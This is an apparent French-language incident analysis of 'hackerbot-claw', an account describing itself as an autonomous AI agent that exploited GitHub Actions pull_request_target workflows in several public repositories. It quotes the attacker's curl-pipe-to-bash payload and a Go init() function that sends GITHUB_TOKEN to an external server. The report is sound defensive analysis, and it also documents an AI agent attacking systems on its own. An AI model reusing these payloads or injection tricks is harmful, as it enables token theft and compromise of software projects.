Hackerbot-Claw : Bot IA exploitant les workflows GitHub Actions

Détails de la campagne d'attaque

Entre le 21 février et le 28 février 2026, un compte GitHub nommé hackerbot-claw a systématiquement analysé des dépôts publics à la recherche de workflows GitHub Actions exploitables. Le compte se décrit comme un "agent de recherche en sécurité autonome alimenté par claude-opus-4-5" et sollicite des dons en cryptomonnaie.

Sur 7 jours, il a :

• Ciblé au moins 6 dépôts appartenant à Microsoft, DataDog, la CNCF et des projets open source populaires
• Ouvert plus de 12 pull requests et déclenché des workflows sur les cibles
• Réussi une exécution de code arbitraire dans au moins 4 d'entre eux
• Exfiltré un GITHUB_TOKEN avec des permissions d'écriture vers un serveur externe

Cibles et méthodologie

Les cibles incluaient :

• microsoft/ai-discovery-agent
• DataDog/datadog-iac-scanner
• avelino/awesome-go (140k+ étoiles)
• ambient-code/platform
• project-akri/akri (un projet CNCF)

Chaque attaque a livré la même charge utile : curl -sSfL hackmoltrepeat.com/molt | bash mais chacune a utilisé une technique complètement différente pour l'exécuter.

Le README du bot révèle sa méthodologie : il charge un "index de modèles de vulnérabilité" avec 9 classes et 47 sous-modèles, puis scanne, vérifie et dépose des preuves de concept d'exploits de manière autonome. Son journal "Activité récente" montre 5 sessions réussies dans les 2 jours précédant l'analyse.

Attaque 1 : avelino/awesome-go - Vol de jeton via script Go empoisonné

L'attaque la plus dommageable de la campagne a exploité la vulnérabilité classique "Pwn Request" - un workflow pull_request_target qui récupère le code non vérifié d'un fork et l'exécute.

Workflow ciblé : Vérifications de qualité des PR - déclenché automatiquement sur chaque PR, il récupère le code de l'auteur de la PR et exécute go run ./.github/scripts/check-quality/.

L'attaque : L'attaquant a injecté une fonction Go init() dans le script de vérification de qualité. En Go, init() s'exécute automatiquement avant main(), donc le code malveillant s'exécute avant toute vérification légitime.

Dans la tentative finale et la plus dangereuse (PR #6069), la charge utile n'a pas seulement exécuté des commandes arbitraires - elle a exfiltré le GITHUB_TOKEN vers un serveur externe :

func init() {
    _ = exec.Command("bash", "-c", `curl -s -H "Authorization: Bearer $GITHUB_TOKEN" ` +
    `-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY" ` +
    `https://recv.hackmoltrepeat.com/ && ` +
    `curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}

L'attaquant a itéré 6 fois sur 18 heures (PR #6058, #6059, #6060, #6061, #6068, #6069), affinant l'approche à chaque fois. Les 4 premières tentatives ont échoué à cause de problèmes de git fetch mais les tentatives 5 et 6 ont réussi.